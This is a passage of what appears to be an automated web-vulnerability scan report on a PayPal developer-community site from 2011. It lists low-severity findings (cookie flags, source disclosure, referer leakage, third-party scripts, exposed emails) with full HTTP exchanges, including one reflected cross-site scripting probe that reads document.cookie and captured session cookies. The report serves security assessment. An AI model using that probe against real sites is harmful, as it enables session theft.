The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/paypal/images/favicon.png HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:37 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: image/png
Content-Length: 967
JP: D=394 t=1317142477511031
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=393788938.11555.0000; path=/

.PNG
.
...IHDR... ... .....szz.....sRGB.........bKGD.............    pHYs.................tIME......*...(...GIDATX.....\E....n?.ibf....... ..8..`....B.!..P...L..4F.......w
.p.&.... .....43}.UU.E]g....
...[SNIP]...

3.17. https://appreview.x.com/wro/g3.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /wro/g3.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wro/g3.css HTTP/1.1
Host: appreview.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all&c527d%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3Ea270701d273=1
Cookie: jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:54:36 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 22 Sep 2011 23:12:12 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 291440
JP: D=476 t=1317142477259861
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerpool_appreview.x.com_443=360234506.11555.0000; path=/

.calendar .nav{background:url("../menuarrow.gif") no-repeat 100% 100%;}.calendar tfoot .ttip .error{color:#c20;}.calendar tfoot tr.time td{padding:0;border-top:1px solid;}.calendar tfoot tr.time td.ti
...[SNIP]...

4. Source code disclosure  previous  next
There are 4 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


4.1. https://appreview.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://appreview.x.com
Path:   /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://appreview.x.com/community/ppx/dev-tools?view=test1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000; jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:24 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 654029
JP: D=1342 t=1317142405555218
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

4.2. https://appreview.x.com/resources/scripts/gen/5d338e169408b250b56288770666021d.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://appreview.x.com
Path:   /resources/scripts/gen/5d338e169408b250b56288770666021d.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /resources/scripts/gen/5d338e169408b250b56288770666021d.js HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://appreview.x.com/search.jspa?peopleEnabled=true&userID=&containerType=&container=&q=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000; jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:45 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 650994
JP: D=1358 t=1317142426187235
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

4.3. https://appreview.x.com/resources/scripts/gen/5e8daa65eff08c12130590779b690338.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://appreview.x.com
Path:   /resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /resources/scripts/gen/5e8daa65eff08c12130590779b690338.js HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://appreview.x.com/index.jspa
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:02 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 648777
JP: D=533 t=1317142383854204
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

4.4. https://appreview.x.com/themes/paypal/js/custom.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://appreview.x.com
Path:   /themes/paypal/js/custom.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /themes/paypal/js/custom.js HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://appreview.x.com/index.jspa
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:02 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 31770
JP: D=595 t=1317142383863570
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.dill
...[SNIP]...
eturn p}('t K={16:\'K\',1L:G,1M:G,1d:G,2f:y(){u(D.2g!=8&&D.1N&&!D.1N[q.16]){q.1L=M;q.1M=M}17 u(D.2g==8){q.1d=M}},2h:D.2i,1O:[],1b:{},2j:y(){u(q.1L||q.1M){D.1N.2L(q.16,\'2M:2N-2O-2P:x\')}u(q.1d){D.2Q(\'<?2R 2S="\'+q.16+\'" 2T="#1P#2k" ?>\')}},2l:y(){t a=D.1k(\'z\');D.2m.1w.1Q(a,D.2m.1w.1w);u(a.12){2n{t b=a.12;b.1x(q.16+\'\\\\:*\',\'{1l:2U(#1P#2k)}\');q.12=b}2o(2p){}}17{q.12=a}},1x:y(a,b,c){u(1R b==\'1S\'||b===2V){b=0}u(b.2W.2q().1y(\'
...[SNIP]...

5. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. https://appreview.x.com/community/ppx/dev-tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /community/ppx/dev-tools

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/dev-tools?view=test1 HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://appreview.x.com/index.jspa
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030333b; Expires=Thu, 27-Oct-2011 16:53:25 GMT; Path=/
Vary: Accept-Encoding,User-Agent
JP: D=94032 t=1317142405217205
Cache-Control: no-cache, private
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 52366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/adaptive_payments" title="Adaptive Payments API">Adaptive Payments API</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/button_manager" title="Button Manager API">Button Manager API</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/ec" title="Express Checkout">Express Checkout</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/mass_pay" title="MassPay">Mass Payment</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/xspaces/mobile/mobile_ec" title="Mobile Express Checkout (MEC)">Mobile Express Checkout</a>
...[SNIP]...
stomers using mobile devices to make purchases. Use it to add Instant Updates for faster transaction review, plus specify URLs for providing additional shipping, insurance, and tax details. (See also: <a href="https://www.x.com/community/ppx/xspaces/mobile/mecl" title="Mobile Express Checkout Library (MECL)">Mobile Express Checkout Library</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/xspaces/mobile" title="Mobile Payments Library (MPL)">Mobile Payments Library</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/payflow_link" title="Payflow Link">Payflow Link</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/payflow_pro" title="Payflow Pro">Payflow Pro</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/vt" title="Virtual Terminal">Virtual Terminal</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/wpp" title="Website Payments Pro (WPP)">Website Payments Pro</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/wps" title="Website Payments Standard (WPS)">Website Payments Standard</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/adaptive_accounts" title="Adaptive Accounts">Adaptive Accounts</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/authentication" title="Authentication">Authentication</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/permissions" title="Permissions Service">Permissions Service</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/recurring_billing" title="Recurring Billing">Recurring Billing</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/recurring_payments" title="Recurring Payments">Recurring Payments</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/ipn" title="Instant Payment Notification">Instant Payment Notification</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/pdt" title="Payment Data Transfer (PDT)">Payment Data Transfer</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/payflow_xml_reporting" title="Payflow XML Reporting">Payflow XML Reporting</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/transaction_information" title="Transaction Information">Transaction Information</a>
...[SNIP]...
<h3><a href="https://www.x.com/community/ppx/website_reporting" title="Website Reporting">Website Reporting</a>
...[SNIP]...
<h5><a href="https://www.x.com/community/ppx/dev-tools/decision_tree">Check out the PayPal X Product Selector</a>
...[SNIP]...
<p>Learn what you need to do first and how the submission process works. <a href="https://www.x.com/community/ppx/apps101">Get an overview on our Adaptive Apps 101 page</a>
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

5.2. https://appreview.x.com/search.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /search.jspa

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search.jspa?peopleEnabled=true&userID=&containerType=&container=&q=xss HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000; jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
JP: D=349531 t=1317142426013421
Cache-Control: no-cache, private
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 59340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6. Cross-domain script include  previous  next
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. https://appreview.x.com/community/ppx/dev-tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /community/ppx/dev-tools

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/dev-tools?view=test1 HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://appreview.x.com/index.jspa
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030333b; Expires=Thu, 27-Oct-2011 16:53:25 GMT; Path=/
Vary: Accept-Encoding,User-Agent
JP: D=94032 t=1317142405217205
Cache-Control: no-cache, private
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 52366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

6.2. https://appreview.x.com/index.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /index.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.jspa HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
JP: D=84250 t=1317142382142698
Cache-Control: no-cache, private
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 49147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

6.3. https://appreview.x.com/search.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /search.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search.jspa?peopleEnabled=true&userID=&containerType=&container=&q=xss HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://appreview.x.com/community/ppx/dev-tools?view=all
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000; jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
JP: D=349531 t=1317142426013421
Cache-Control: no-cache, private
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 59340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7. Email addresses disclosed  previous  next
There are 4 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. https://appreview.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://appreview.x.com/community/ppx/dev-tools?view=test1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CCFCDCC48A75F97B14D776C4ACF6EBD7.node0; jive.server.info="serverName=appreview.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; BIGipServerpool_appreview.x.com_443=410566154.11555.0000; jive.recentHistory.-1=31342c323030333b

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 16:53:24 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 654029
JP: D=1342 t=1317142405555218
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

7.2. https://appreview.x.com/resources/scripts/gen/5d338e169408b250b56288770666021d.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appreview.x.com
Path:   /resources/scripts/gen/5d338e169408b250b56288770666021d.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/gen/5d338e169408b250b56288770666021d.js HTTP/1.1
Host: appreview.x.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://appreview.x.com/search.jspa?peopleEnabled=true&userID=&containerType=&container=&q=xss
Accept-Encoding: gzip,deflate,sdch
